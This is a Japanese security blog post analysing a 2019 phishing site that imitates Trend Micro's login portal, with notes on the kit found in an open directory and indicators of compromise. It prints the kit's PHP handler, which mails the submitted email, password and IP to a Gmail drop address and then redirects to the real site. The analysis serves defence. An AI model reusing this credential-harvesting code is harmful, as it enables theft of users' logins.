トレンドマイクロのユーザー狙い？

• ID（メールアドレス）、パスワードの窃取を目的としたもの。氏名、住所やクレジットカード情報を入力する画面は確認されず。
• 「Sign In」クリック後は正規のトレンドマイクロ社のポータルサイトtm.login.trendmicro.comに遷移する。フィッシング詐欺サイトは入力チェックもしていないので、何も入力せずクリックしても正規サイトへ飛ばされる。
• 表記は英語のみ。正規サイトは日本語圏から接続すると日本語表示となる。
• Twitterでの報告を確認したもので、このサイトへ誘導するメール等はpiyokangoは確認していない。
• トレンドマイクロの調査によれば、当該サイトへ誘導するフィッシングメールも存在していた模様。

同ディレクトリにZIPファイル

• フィッシング詐欺サイトが設置されたサーバーはディレクトリリスティングが可能な状態だった。
• 詐欺サイトが設置されたディレクトリのリスト中に「trendmicro.zip」というZIPファイルも存在。
• ZIPファイルの中身は今回設置されていたトレンドマイクロのフィッシング詐欺のキットとみられる複数のファイルが内包されていた。
• 表記された日付からフィッシング詐欺サイトも2019年12月9日に設置されたものとみられる。

入力後にメール送信するPHP

• 「biz.php」はGmailアドレスfegrapuoltry3@gmail.comに対し、入力されたメールアドレス、パスワードを送信。その後トレンドマイクロの正規サイトへリダイレクトさせるもの。
• Created BY GPAという表記が見受けられる。

$ip = getenv("REMOTE_ADDR");
$message .= "--------------New Login--------\n";
$message .= "Email-ID : ".$_POST['username']."\n";
$message .= "Password : ".$_POST['password']."\n";
$message .= "Client IP : ".$ip."\n";
$message .= "---------------Created BY GPA-----------\n";
$send = "fegrapuoltry3@gmail.com";
$subject = "--New Log $ip -- Source:(trendmicro.com)";

mail($send,$subject,$message,$headers);

$redirect = "https://tm.login.trendmicro.com/authenticate/api/true?retryURL=https%3A%2F%2Ftm.login.trendmicro.com%2Fsimplesaml%2Fmodule.php%2Fcore%2Floginuserpass.php";

header("Location: " . $redirect);

関連情報

• フィッシングURL innovabolivia[.]com/css/trendmicro/static.php
• ZIPファイル 417eac5a5a00480fd58dd2e66646241a4fbbbdb17d0e7755b4ffdb86a15429b5

更新履歴

• 2019年12月10日 AM 新規作成
• 2019年12月12日 PM トレンドマイクロの記事を追記